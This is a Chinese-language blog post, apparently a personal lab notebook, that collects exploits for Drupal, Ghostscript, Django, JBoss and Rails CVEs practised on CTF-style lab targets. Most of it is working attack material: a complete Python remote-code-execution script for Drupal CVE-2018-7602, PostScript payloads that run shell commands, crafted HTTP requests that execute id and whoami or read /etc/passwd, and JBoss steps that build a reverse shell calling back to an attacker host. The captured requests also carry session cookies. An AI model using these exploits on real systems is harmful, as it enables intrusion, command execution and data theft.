Drupal 7.x，8.x

修复版本

Drupal 7.59，Drupal 8.5.3，Drupal 8.4.8

漏洞利用

直接上exp：

#!/usr/bin/env python3

import requests
import argparse
from bs4 import BeautifulSoup

def get_args():
  parser = argparse.ArgumentParser( prog="drupa7-CVE-2018-7602.py",
                    formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),
                    epilog= '''
                    This script will exploit the (CVE-2018-7602) vulnerability in Drupal 7 <= 7.58
                    using an valid account and poisoning the cancel account form (user_cancel_confirm_form) 
                    with the 'destination' variable and triggering it with the upload file via ajax (/file/ajax).
                    ''')

  parser.add_argument("user", help="Username")
  parser.add_argument("password", help="Password")
  parser.add_argument("target", help="URL of target Drupal site (ex: http://target.com/)")
  parser.add_argument("-c", "--command", default="id", help="Command to execute (default = id)")
  parser.add_argument("-f", "--function", default="passthru", help="Function to use as attack vector (default = passthru)")
  parser.add_argument("-x", "--proxy", default="", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = none)")
  args = parser.parse_args()
  return args

def pwn_target(target, username, password, function, command, proxy):
  requests.packages.urllib3.disable_warnings()
  session = requests.Session()
  proxyConf = {'http': proxy, 'https': proxy}
  try:
    print('[*] Creating a session using the provided credential...')
    get_params = {'q':'user/login'}
    post_params = {'form_id':'user_login', 'name': username, 'pass' : password, 'op':'Log in'}
    print('[*] Finding User ID...')
    session.post(target, params=get_params, data=post_params, verify=False, proxies=proxyConf)
    get_params = {'q':'user'}
    r = session.get(target, params=get_params, verify=False, proxies=proxyConf)
    soup = BeautifulSoup(r.text, "html.parser")
    user_id = soup.find('meta', {'property': 'foaf:name'}).get('about')
    if ("?q=" in user_id):
      user_id = user_id.split("=")[1]
    if(user_id):
      print('[*] User ID found: ' + user_id)
    print('[*] Poisoning a form using \'destination\' and including it in cache.')
    get_params = {'q': user_id + '/cancel'}
    r = session.get(target, params=get_params, verify=False, proxies=proxyConf)
    soup = BeautifulSoup(r.text, "html.parser")
    form = soup.find('form', {'id': 'user-cancel-confirm-form'})
    form_token = form.find('input', {'name': 'form_token'}).get('value')
    get_params = {'q': user_id + '/cancel', 'destination' : user_id +'/cancel?q[%23post_render][]=' + function + '&q[%23type]=markup&q[%23markup]=' + command }
    post_params = {'form_id':'user_cancel_confirm_form','form_token': form_token, '_triggering_element_name':'form_id', 'op':'Cancel account'}
    r = session.post(target, params=get_params, data=post_params, verify=False, proxies=proxyConf)
    soup = BeautifulSoup(r.text, "html.parser")
    form = soup.find('form', {'id': 'user-cancel-confirm-form'})
    form_build_id = form.find('input', {'name': 'form_build_id'}).get('value')
    if form_build_id:
        print('[*] Poisoned form ID: ' + form_build_id)
        print('[*] Triggering exploit to execute: ' + command)
        get_params = {'q':'file/ajax/actions/cancel/#options/path/' + form_build_id}
        post_params = {'form_build_id':form_build_id}
        r = session.post(target, params=get_params, data=post_params, verify=False, proxies=proxyConf)
        parsed_result = r.text.split('[{"command":"settings"')[0]
        print(parsed_result)
  except:
    print("ERROR: Something went wrong.")
    raise

def main():
  print ()
  print ('===================================================================================')
  print ('|   DRUPAL 7 <= 7.58 REMOTE CODE EXECUTION (SA-CORE-2018-004 / CVE-2018-7602)     |')
  print ('|                                   by pimps                                      |')
  print ('===================================================================================\n')

  args = get_args() # get the cl args
  pwn_target(args.target.strip(),args.user.strip(),args.password.strip(), args.function.strip(), args.command.strip(), args.proxy.strip())


if __name__ == '__main__':
  main()

[GhostScript]CVE-2018-19475

漏洞利用

构造文件poc.png如下并上传即可

%!PS
0 1 300367 {} for
{save restore} stopped {} if
(%pipe%env) (w) file

[Django]CVE-2017-12794

漏洞利用

访问两次http://node3.buuoj.cn:25404/create_user/?username=%3Cscript%3Ealert(1)%3C/script%3E即可

[Jboss]CVE-2017-7504

影响版本

JBoss AS 4.x及之前版本。

漏洞利用

git clone https://github.com/joaomatosf/JavaDeserH2HC
cd JavaDeserH2HC-master
javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java
java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 攻击机IP:监听端口
nc -lvvp 监听端口
curl http://192.168.1.17:8080/jbossmq-httpil/HTTPServerILServlet  --data-binary @ReverseShellCommonsCollectionsHashMap.ser

[GhostScript]CVE-2018-16509

影响版本

Ghostscript 9.24之前版本

漏洞成因

在处理/invalidaccess异常时，程序没有正确的检测‘restoration of privilege（权限恢复）’。攻击者可通过提交特制的PostScript利用该漏洞执行代码

漏洞利用

构造内容为如下的poc.png上传即可：

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id > /tmp/success && cat /tmp/success) currentdevice putdeviceprops

POST / HTTP/1.1
Host: node3.buuoj.cn:29804
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------393209413412707986411236982208
Content-Length: 407
Origin: http://node3.buuoj.cn:29804
Connection: close
Referer: http://node3.buuoj.cn:29804/
Cookie: UM_distinctid=176daf6a6745d-0dffedf6acd35-4c3f207e-144000-176daf6a67591d; pma_lang=zh_CN; pma_collation_connection=utf8_unicode_ci; pma_iv-1=NDgzEy%2B%2BtLdtQ9IKW3T55g%3D%3D; pmaUser-1=Ysr3SyWxkPvfdBWH%2FDEVDA%3D%3D; _xsrf=2|406ca202|6bac99e6054d1f4bdac82277f76c5b44|1615008333; csrftoken=13SJomfN01Y2BJzpt8TNBFHYcIqMosKX7xUKgMAIdaIPBOq1Dl5q1ZW8WmxA6jHA; sessionid=k2hmrn51p09i71g5fo444a0qzcdk5uu9; 5H6_sid=0gGS3S; 5H6_visitedfid=2; phpMyAdmin=fb4767a90d17ef096a0d8a855adc604e4406f0c6; pma_console_height=92; pma_console_mode=collapse; pma_console_config=%7B%22alwaysExpand%22%3Afalse%2C%22startHistory%22%3Afalse%2C%22currentQuery%22%3Atrue%7D; auto_saved_sql=select%20%22%3C%3Fphp%20phpinfo()%3B%3F%3E%22; pmaPass-1=YMswMhHaJOw%2Bkt%2FFSCiG8w%3D%3D; has_js=1; Drupal.toolbar.collapsed=0; SESSced50b27c3c52615544d5f53779a9749=O8-b8qDlW7D9NSOJs6_9Qht8ehKwwD38_22Ya4XqJPA
Upgrade-Insecure-Requests: 1

-----------------------------393209413412707986411236982208
Content-Disposition: form-data; name="file_upload"; filename="a.jpg"
Content-Type: image/jpeg

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%env) currentdevice putdeviceprops
-----------------------------393209413412707986411236982208--

[Drupal]CVE-2018-7600

漏洞利用

直接上poc，没有复现成功，很痛苦

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: ip:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 107

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id【替换id执行命令】

poc2:

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: ip:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.18.0.1:8080/user/register
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663
Content-Length: 625
Connection: close

-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#post_render][]"

passthru
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#type]"

markup
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="mail[#markup]"

whoami
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="form_id"

user_register_form
-----------------------------99533888113153068481322586663
Content-Disposition: form-data; name="_drupal_ajax"

[Rails]CVE-2019-5418

影响版本

Rails 全版本

其中修复版本：

Rails 6.0.0.beta3，5.2.2.1，5.1.6.2，5.0.7.2，4.2.11.1

漏洞利用

修改accept头

GET /robots.txt HTTP/1.1
Host: node3.buuoj.cn:26975
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: ../../../../../../../../etc/passwd{{
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: UM_distinctid=176daf6a6745d-0dffedf6acd35-4c3f207e-144000-176daf6a67591d; pma_lang=zh_CN; pma_collation_connection=utf8_unicode_ci; pma_iv-1=NDgzEy%2B%2BtLdtQ9IKW3T55g%3D%3D; pmaUser-1=Ysr3SyWxkPvfdBWH%2FDEVDA%3D%3D; _xsrf=2|406ca202|6bac99e6054d1f4bdac82277f76c5b44|1615008333; csrftoken=13SJomfN01Y2BJzpt8TNBFHYcIqMosKX7xUKgMAIdaIPBOq1Dl5q1ZW8WmxA6jHA; sessionid=k2hmrn51p09i71g5fo444a0qzcdk5uu9; 5H6_sid=0gGS3S; 5H6_visitedfid=2; phpMyAdmin=fb4767a90d17ef096a0d8a855adc604e4406f0c6; pma_console_height=92; pma_console_mode=collapse; pma_console_config=%7B%22alwaysExpand%22%3Afalse%2C%22startHistory%22%3Afalse%2C%22currentQuery%22%3Atrue%7D; auto_saved_sql=select%20%22%3C%3Fphp%20phpinfo()%3B%3F%3E%22; pmaPass-1=YMswMhHaJOw%2Bkt%2FFSCiG8w%3D%3D; has_js=1; Drupal.toolbar.collapsed=0; SESSced50b27c3c52615544d5f53779a9749=O8-b8qDlW7D9NSOJs6_9Qht8ehKwwD38_22Ya4XqJPA
Upgrade-Insecure-Requests: 1
If-None-Match: W/"0eb39f0c9ad6561ce35364e3c5065d54"

很尴尬的是我的bp改完发包之后，连接就被重置，而且我抓不到访问robots.txt的包。

[Jboss]CVE-2017-12149

漏洞利用

记录一下https://github.com/vulhub/vulhub/tree/master/jboss/CVE-2017-12149

本文作者： Sn1pEr
本文链接： https://sn1per-ssd.github.io/2021/03/04/部分框架exp/
版权声明： 本博客所有文章除特别声明外，均采用 MIT 许可协议。转载请注明出处！